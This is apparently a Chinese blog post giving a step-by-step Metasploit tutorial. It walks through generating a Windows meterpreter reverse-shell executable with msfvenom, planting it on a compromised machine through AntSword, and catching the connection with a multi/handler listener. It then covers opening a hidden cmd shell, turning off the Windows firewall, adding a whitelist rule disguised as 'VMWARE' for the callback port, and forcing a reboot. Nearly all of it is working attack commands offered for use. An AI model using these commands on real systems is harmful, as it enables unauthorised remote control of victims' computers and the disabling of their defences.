一、msf需要生成一个paylaod,window下面生成一个exe
sudo ./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.20.10.10 LPORT=3333 -f exe -o shell.exe
注意:权限不够用sudo权限
二、生成的paylaod发送到目标机器让其执行
假设蚁剑成功得到一台机器,那么将payload一般上传到tmp目录下在终端运行start shell.exe,下面用虚拟机进行测试:
三、msf配置监听
msf配置监听之前要配置payload,不然就会连接不上
现在配置端口
use exploit/multi/handler
set LHOST 172.20.10.10
set LPORT 3333
Exploit
开始监听
四、msf里面查看获得的机器
Sessions 序号:选择机器
选择机器后输入shell 或者execute -f cmd -i -h命令可以进入机器的cmd命令行
-h:隐藏创建的进程
-i:通过创建的进程返回一个接口,这个接口就是我们用来操作的接口
乱码的话,使用chcp,切换代码页
chcp 65001:Utf-8
五、msf通过shel关闭防火墙
Netsh advfirewall set allprofiles state off(关闭防火墙)
Netsh advfirewall show allprofiles (查看防火墙状况)
通过策略添加防火墙规则规避行为(设置某个端口的行为不被防火墙所约束,相当于加入白名单)
1、netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=3333 action=allow
2、netsh firewall add portopening TCP 3333 "VMWARE" ENABLE ALL
重启生效
Shutdown -r -f -t 0
-f:强制重启
-t :时间为0,立即重启
标签:set,机器,收集,防火墙,3333,exe,msf,MSF,内网 From: https://www.cnblogs.com/TT-JZ/p/16876936.html